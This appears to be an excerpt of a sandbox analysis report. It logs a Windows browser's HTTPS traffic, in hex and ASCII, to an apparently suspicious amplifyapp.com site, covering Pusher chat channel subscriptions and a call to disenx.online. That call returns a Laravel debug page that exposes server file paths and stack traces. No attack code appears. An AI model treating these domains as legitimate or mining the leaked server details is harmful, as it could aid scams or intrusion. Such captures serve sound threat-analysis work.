                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.64973352.48.38.994435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:25 UTC761OUTPOST /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1711393641468&n=1 HTTP/1.1
                                          Host: sockjs-eu.pusher.com
                                          Connection: keep-alive
                                          Content-Length: 0
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-platform: "Windows"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Content-Type: application/json
                                          Accept: */*
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:25 UTC419INHTTP/1.1 200 OK
                                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                                          access-control-allow-origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          vary: Origin
                                          access-control-allow-credentials: true
                                          content-type: application/javascript; charset=UTF-8
                                          date: Mon, 25 Mar 2024 19:07:25 GMT
                                          keep-alive: timeout=5
                                          transfer-encoding: chunked
                                          strict-transport-security: max-age=15768000
                                          connection: close
                                          2024-03-25 19:07:25 UTC2060INData Raw: 38 30 35 0d 0a 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68 68
                                          Data Ascii: 805hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
                                          2024-03-25 19:07:25 UTC142INData Raw: 38 38 0d 0a 61 5b 22 7b 5c 22 65 76 65 6e 74 5c 22 3a 5c 22 70 75 73 68 65 72 3a 63 6f 6e 6e 65 63 74 69 6f 6e 5f 65 73 74 61 62 6c 69 73 68 65 64 5c 22 2c 5c 22 64 61 74 61 5c 22 3a 5c 22 7b 5c 5c 5c 22 73 6f 63 6b 65 74 5f 69 64 5c 5c 5c 22 3a 5c 5c 5c 22 31 38 31 32 36 38 2e 35 34 32 36 31 33 33 5c 5c 5c 22 2c 5c 5c 5c 22 61 63 74 69 76 69 74 79 5f 74 69 6d 65 6f 75 74 5c 5c 5c 22 3a 31 32 30 7d 5c 22 7d 22 5d 0a 0d 0a
                                          Data Ascii: 88a["{\"event\":\"pusher:connection_established\",\"data\":\"{\\\"socket_id\\\":\\\"181268.5426133\\\",\\\"activity_timeout\\\":120}\"}"]
                                          2024-03-25 19:07:27 UTC124INData Raw: 37 36 0d 0a 61 5b 22 7b 5c 22 65 76 65 6e 74 5c 22 3a 5c 22 70 75 73 68 65 72 5f 69 6e 74 65 72 6e 61 6c 3a 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 73 75 63 63 65 65 64 65 64 5c 22 2c 5c 22 64 61 74 61 5c 22 3a 5c 22 7b 7d 5c 22 2c 5c 22 63 68 61 6e 6e 65 6c 5c 22 3a 5c 22 70 75 62 6c 69 63 2d 63 68 61 74 2e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 5c 22 7d 22 5d 0a 0d 0a
                                          Data Ascii: 76a["{\"event\":\"pusher_internal:subscription_succeeded\",\"data\":\"{}\",\"channel\":\"public-chat.102.165.48.43\"}"]
                                          2024-03-25 19:07:52 UTC7INData Raw: 32 0d 0a 68 0a 0d 0a
                                          Data Ascii: 2h
                                          2024-03-25 19:08:17 UTC38INData Raw: 31 42 0d 0a 63 5b 31 30 30 36 2c 22 48 65 61 72 74 62 65 61 74 20 6d 69 73 73 65 64 22 5d 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1Bc[1006,"Heartbeat missed"]0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.64973513.249.39.804435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:25 UTC374OUTGET /favicon.ico HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:26 UTC538INHTTP/1.1 200 OK
                                          Content-Type: image/vnd.microsoft.icon
                                          Content-Length: 5430
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:26 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "de76b0c210c815ef282d5b59de8a0567"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 5eb5e19c1a78889d10ff38f1551ed2aa.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: prrdxCuMZZj5JXmWL3CbjiIrWNEqGrm8xXVaEKwcJqtaBduptMxfhw==
                                          2024-03-25 19:07:26 UTC5430INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 65 06 2b e2 66 02 8f e1 66 01 d5 ff ff ff ff ff ff ff ff e1 65 00 d5 e2 66 00 8f e1 6b 06 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 2b 06 e3 69 03 94 e4 6b 03 fd e3 69 02 ff e3 69 02 ff ff ff ff ff ff ff ff ff e3 69 02 ff e3 69 02 ff e4 6a 03 fd e3 69 03 94 ff 80 2b 06 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 2b 06 e5 6f 04 bd e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff ff ff ff ff ff ff ff ff e5 6e 04 ff e5 6e 04 ff e5 6e 04 ff e5
                                          Data Ascii: h& ( e+ffefk++ikiiiiji++onnnnnnn


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.649734198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:25 UTC350OUTGET /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:26 UTC346INHTTP/1.1 405 Method Not Allowed
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          allow: POST
                                          cache-control: no-cache, private
                                          access-control-allow-origin: *
                                          content-type: text/html; charset=UTF-8
                                          transfer-encoding: chunked
                                          date: Mon, 25 Mar 2024 19:07:26 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close
                                          2024-03-25 19:07:26 UTC16038INData Raw: 37 45 39 41 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 61 75 74 6f 22 3e 0a 3c 21 2d 2d 0a 53 79 6d 66 6f 6e 79 5c 43 6f 6d 70 6f 6e 65 6e 74 5c 48 74 74 70 4b 65 72 6e 65 6c 5c 45 78 63 65 70 74 69 6f 6e 5c 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 3a 20 54 68 65 20 47 45 54 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 66 6f 72 20 74 68 69 73 20 72 6f 75 74 65 2e 20 53 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 73 3a 20 50 4f 53 54 2e 20 69 6e 20 66 69 6c 65 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65
                                          Data Ascii: 7E9A<!DOCTYPE html><html lang="en" class="auto">...Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException: The GET method is not supported for this route. Supported methods: POST. in file /home/disercoq/public_html/vendor/laravel/frame
                                          2024-03-25 19:07:26 UTC16384INData Raw: 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 70 72 65 2e 73 66 2d 64 75 6d 70 20 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 3e 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 2d 6e 65 78 74 2c 70 72 65 2e 73 66 2d 64 75 6d 70 20 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 77 72 61 70 70 65 72 3e 2e 73 66 2d 64 75 6d 70 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 2d 70 72 65 76 69 6f 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 72 67 62 28 31 30 37 20 31 31 34 20 31 32 38 2f 76 61
                                          Data Ascii: m!important;padding-right:.5rem!important}pre.sf-dump .sf-dump-search-wrapper>.sf-dump-search-input-next,pre.sf-dump .sf-dump-search-wrapper>.sf-dump-search-input-previous{background-color:transparent!important;--tw-text-opacity:1;color:rgb(107 114 128/va
                                          2024-03-25 19:07:26 UTC16384INData Raw: 0d 0a 65 6d 3b 67 61 70 3a 2e 37 35 72 65 6d 7d 2e 67 61 70 2d 70 78 7b 67 72 69 64 2d 67 61 70 3a 31 70 78 3b 67 61 70 3a 31 70 78 7d 2e 67 61 70 2d 31 7b 67 72 69 64 2d 67 61 70 3a 2e 32 35 72 65 6d 3b 67 61 70 3a 2e 32 35 72 65 6d 7d 2e 67 61 70 2d 79 2d 32 7b 67 72 69 64 2d 72 6f 77 2d 67 61 70 3a 2e 35 72 65 6d 3b 72 6f 77 2d 67 61 70 3a 2e 35 72 65 6d 7d 2e 73 70 61 63 65 2d 78 2d 70 78 3e 3a 6e 6f 74 28 5b 68 69 64 64 65 6e 5d 29 7e 3a 6e 6f 74 28 5b 68 69 64 64 65 6e 5d 29 7b 2d 2d 74 77 2d 73 70 61 63 65 2d 78 2d 72 65 76 65 72 73 65 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 63 61 6c 63 28 31 70 78 2a 76 61 72 28 2d 2d 74 77 2d 73 70 61 63 65 2d 78 2d 72 65 76 65 72 73 65 29 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 63 61 6c 63 28 31 70 78
                                          Data Ascii: em;gap:.75rem}.gap-px{grid-gap:1px;gap:1px}.gap-1{grid-gap:.25rem;gap:.25rem}.gap-y-2{grid-row-gap:.5rem;row-gap:.5rem}.space-x-px>:not([hidden])~:not([hidden]){--tw-space-x-reverse:0;margin-right:calc(1px*var(--tw-space-x-reverse));margin-left:calc(1px
                                          2024-03-25 19:07:26 UTC16384INData Raw: 6e 5c 5c 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 2c 22 31 31 35 22 3a 22 20 20 20 20 20 2a 5c 2f 22 2c 22 31 31 36 22 3a 22 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 66 75 6e 63 74 69 6f 6e 20 6d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 28 61 72 72 61 79 20 24 6f 74 68 65 72 73 2c 20 24 6d 65 74 68 6f 64 29 22 2c 22 31 31 37 22 3a 22 20 20 20 20 7b 22 2c 22 31 31 38 22 3a 22 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 4d 65 74 68 6f 64 4e 6f 74 41 6c 6c 6f 77 65 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 28 22 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 66 72 61 6d 65 22 3a 66 61 6c 73 65 7d 2c 7b 22 66 69 6c 65 22 3a 22 5c 2f 68 6f 6d 65 5c 2f 64 69 73 65 72 63 6f 71 5c 2f 70 75 62 6c 69 63
                                          Data Ascii: n\\MethodNotAllowedHttpException","115":" *\/","116":" protected function methodNotAllowed(array $others, $method)","117":" {","118":" throw new MethodNotAllowedHttpException("},"application_frame":false},{"file":"\/home\/disercoq\/public
                                          2024-03-25 19:07:26 UTC16384INData Raw: 37 46 43 34 0d 0a 20 20 72 65 74 75 72 6e 20 70 61 72 65 6e 74 3a 3a 68 61 6e 64 6c 65 28 24 72 65 71 75 65 73 74 2c 20 24 6e 65 78 74 29 3b 22 2c 22 34 31 22 3a 22 20 20 20 20 7d 22 2c 22 34 32 22 3a 22 22 2c 22 34 33 22 3a 22 20 20 20 20 5c 2f 2a 2a 22 2c 22 34 34 22 3a 22 20 20 20 20 20 2a 20 54 72 61 6e 73 66 6f 72 6d 20 74 68 65 20 67 69 76 65 6e 20 76 61 6c 75 65 2e 22 2c 22 34 35 22 3a 22 20 20 20 20 20 2a 22 2c 22 34 36 22 3a 22 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 20 73 74 72 69 6e 67 20 20 24 6b 65 79 22 2c 22 34 37 22 3a 22 20 20 20 20 20 2a 20 40 70 61 72 61 6d 20 20 6d 69 78 65 64 20 20 24 76 61 6c 75 65 22 2c 22 34 38 22 3a 22 20 20 20 20 20 2a 20 40 72 65 74 75 72 6e 20 6d 69 78 65 64 22 2c 22 34 39 22 3a 22 20 20 20 20 20 2a 5c 2f 22
                                          Data Ascii: 7FC4 return parent::handle($request, $next);","41":" }","42":"","43":" \/**","44":" * Transform the given value.","45":" *","46":" * @param string $key","47":" * @param mixed $value","48":" * @return mixed","49":" *\/"
                                          2024-03-25 19:07:26 UTC16384INData Raw: 20 20 20 24 70 69 70 65 6c 69 6e 65 20 3d 20 61 72 72 61 79 5f 72 65 64 75 63 65 28 22 2c 22 31 31 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 61 72 72 61 79 5f 72 65 76 65 72 73 65 28 24 74 68 69 73 2d 5c 75 30 30 33 45 70 69 70 65 73 28 29 29 2c 20 24 74 68 69 73 2d 5c 75 30 30 33 45 63 61 72 72 79 28 29 2c 20 24 74 68 69 73 2d 5c 75 30 30 33 45 70 72 65 70 61 72 65 44 65 73 74 69 6e 61 74 69 6f 6e 28 24 64 65 73 74 69 6e 61 74 69 6f 6e 29 22 2c 22 31 31 34 22 3a 22 20 20 20 20 20 20 20 20 29 3b 22 2c 22 31 31 35 22 3a 22 22 2c 22 31 31 36 22 3a 22 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 24 70 69 70 65 6c 69 6e 65 28 24 74 68 69 73 2d 5c 75 30 30 33 45 70 61 73 73 61 62 6c 65 29 3b 22 2c 22 31 31 37 22 3a 22 20 20 20 20 7d 22 2c 22 31 31 38 22
                                          Data Ascii: $pipeline = array_reduce(","113":" array_reverse($this-\u003Epipes()), $this-\u003Ecarry(), $this-\u003EprepareDestination($destination)","114":" );","115":"","116":" return $pipeline($this-\u003Epassable);","117":" }","118"
                                          2024-03-25 19:07:26 UTC16384INData Raw: 69 73 2d 5c 75 30 30 33 45 61 70 70 2d 5c 75 30 30 33 45 68 61 73 42 65 65 6e 42 6f 6f 74 73 74 72 61 70 70 65 64 28 29 29 20 7b 22 2c 22 31 35 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 24 74 68 69 73 2d 5c 75 30 30 33 45 61 70 70 2d 5c 75 30 30 33 45 62 6f 6f 74 73 74 72 61 70 57 69 74 68 28 24 74 68 69 73 2d 5c 75 30 30 33 45 62 6f 6f 74 73 74 72 61 70 70 65 72 73 28 29 29 3b 22 2c 22 31 35 34 22 3a 22 20 20 20 20 20 20 20 20 7d 22 2c 22 31 35 35 22 3a 22 20 20 20 20 7d 22 2c 22 31 35 36 22 3a 22 22 2c 22 31 35 37 22 3a 22 20 20 20 20 5c 2f 2a 2a 22 2c 22 31 35 38 22 3a 22 20 20 20 20 20 2a 20 47 65 74 20 74 68 65 20 72 6f 75 74 65 20 64 69 73 70 61 74 63 68 65 72 20 63 61 6c 6c 62 61 63 6b 2e 22 2c 22 31 35 39 22 3a 22 20 20 20 20 20 2a 22 2c 22
                                          Data Ascii: is-\u003Eapp-\u003EhasBeenBootstrapped()) {","153":" $this-\u003Eapp-\u003EbootstrapWith($this-\u003Ebootstrappers());","154":" }","155":" }","156":"","157":" \/**","158":" * Get the route dispatcher callback.","159":" *","
                                          2024-03-25 19:07:26 UTC16384INData Raw: 64 2e 22 2c 22 31 36 39 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 70 69 70 65 20 3d 20 24 74 68 69 73 2d 5c 75 30 30 33 45 67 65 74 43 6f 6e 74 61 69 6e 65 72 28 29 2d 5c 75 30 30 33 45 6d 61 6b 65 28 24 6e 61 6d 65 29 3b 22 2c 22 31 37 30 22 3a 22 22 2c 22 31 37 31 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 70 61 72 61 6d 65 74 65 72 73 20 3d 20 61 72 72 61 79 5f 6d 65 72 67 65 28 5b 24 70 61 73 73 61 62 6c 65 2c 20 24 73 74 61 63 6b 5d 2c 20 24 70 61 72 61 6d 65 74 65 72 73 29 3b 22 2c 22 31 37 32 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 22 2c 22 31 37 33 22 3a 22 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: d.","169":" $pipe = $this-\u003EgetContainer()-\u003Emake($name);","170":"","171":" $parameters = array_merge([$passable, $stack], $parameters);","172":" } else {","173":"
                                          2024-03-25 19:07:26 UTC16384INData Raw: 37 46 39 43 0d 0a 6c 6f 77 65 64 28 29 0a 23 31 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 28 34 31 29 3a 20 49 6c 6c 75 6d 69 6e 61 74 65 5c 52 6f 75 74 69 6e 67 5c 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2d 26 67 74 3b 67 65 74 52 6f 75 74 65 46 6f 72 4d 65 74 68 6f 64 73 28 29 0a 23 32 20 2f 68 6f 6d 65 2f 64 69 73 65 72 63 6f 71 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c
                                          Data Ascii: 7F9Clowed()#1 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php(41): Illuminate\Routing\AbstractRouteCollection-&gt;getRouteForMethods()#2 /home/disercoq/public_html/vendor/laravel/framework/src/Ill
                                          2024-03-25 19:07:26 UTC16384INData Raw: 65 20 77 69 74 68 69 6e 20 74 68 65 20 63 68 69 6c 64 20 63 6f 6d 70 6f 6e 65 6e 74 2c 20 79 6f 75 20 73 68 6f 75 6c 64 20 70 61 73 73 20 69 74 20 61 73 20 61 20 64 69 66 66 65 72 65 6e 74 20 70 72 6f 70 2e 20 28 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 6c 69 6e 6b 2f 73 70 65 63 69 61 6c 2d 70 72 6f 70 73 29 22 2c 74 29 29 7d 3b 6e 2e 69 73 52 65 61 63 74 57 61 72 6e 69 6e 67 3d 21 30 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 6b 65 79 22 2c 7b 67 65 74 3a 6e 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 2c 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 48 7c 7c 28 48 3d 21 30 2c 77 28 22 25 73 3a 20 60 72 65 66 60 20 69 73 20 6e 6f 74 20 61
                                          Data Ascii: e within the child component, you should pass it as a different prop. (https://reactjs.org/link/special-props)",t))};n.isReactWarning=!0,Object.defineProperty(e,"key",{get:n,configurable:!0})}function K(e,t){var n=function(){H||(H=!0,w("%s: `ref` is not a


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.64973652.48.38.994435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:25 UTC626OUTOPTIONS /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_send?t=1711393644596&n=2 HTTP/1.1
                                          Host: sockjs-eu.pusher.com
                                          Connection: keep-alive
                                          Accept: */*
                                          Access-Control-Request-Method: POST
                                          Access-Control-Request-Headers: content-type
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:26 UTC487INHTTP/1.1 204 No Content
                                          access-control-allow-origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          vary: Origin
                                          access-control-allow-headers: content-type
                                          access-control-allow-credentials: true
                                          cache-control: public, max-age=31536000
                                          expires: Tue, 25 Mar 2025 19:07:26 GMT
                                          access-control-allow-methods: OPTIONS, POST
                                          access-control-max-age: 31536000
                                          date: Mon, 25 Mar 2024 19:07:26 GMT
                                          keep-alive: timeout=5
                                          strict-transport-security: max-age=15768000
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.64973852.48.38.994435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:26 UTC723OUTPOST /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_send?t=1711393644596&n=2 HTTP/1.1
                                          Host: sockjs-eu.pusher.com
                                          Connection: keep-alive
                                          Content-Length: 103
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-platform: "Windows"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Content-Type: application/json
                                          Accept: */*
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:26 UTC103OUTData Raw: 5b 22 7b 5c 22 65 76 65 6e 74 5c 22 3a 5c 22 70 75 73 68 65 72 3a 73 75 62 73 63 72 69 62 65 5c 22 2c 5c 22 64 61 74 61 5c 22 3a 7b 5c 22 61 75 74 68 5c 22 3a 5c 22 5c 22 2c 5c 22 63 68 61 6e 6e 65 6c 5c 22 3a 5c 22 70 75 62 6c 69 63 2d 63 68 61 74 2e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 5c 22 7d 7d 22 5d
                                          Data Ascii: ["{\"event\":\"pusher:subscribe\",\"data\":{\"auth\":\"\",\"channel\":\"public-chat.102.165.48.43\"}}"]
                                          2024-03-25 19:07:27 UTC387INHTTP/1.1 204 No Content
                                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                                          access-control-allow-origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          vary: Origin
                                          access-control-allow-credentials: true
                                          content-type: text/plain; charset=UTF-8
                                          date: Mon, 25 Mar 2024 19:07:26 GMT
                                          keep-alive: timeout=5
                                          strict-transport-security: max-age=15768000
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.64974052.165.165.26443
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Bx8gPCgPUcp42UL&MD=5RhX4v+r HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                          Host: slscr.update.microsoft.com
                                          2024-03-25 19:07:29 UTC560INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Content-Type: application/octet-stream
                                          Expires: -1
                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                          MS-CorrelationId: d1d346c5-62b3-4c54-8dc9-40ec4d56a412
                                          MS-RequestId: a6f41dad-822f-48c3-9c66-21f0b7457b5f
                                          MS-CV: Cuz92nM0AEKhTQrq.0
                                          X-Microsoft-SLSClientCache: 2880
                                          Content-Disposition: attachment; filename=environment.cab
                                          X-Content-Type-Options: nosniff
                                          Date: Mon, 25 Mar 2024 19:07:28 GMT
                                          Connection: close
                                          Content-Length: 24490
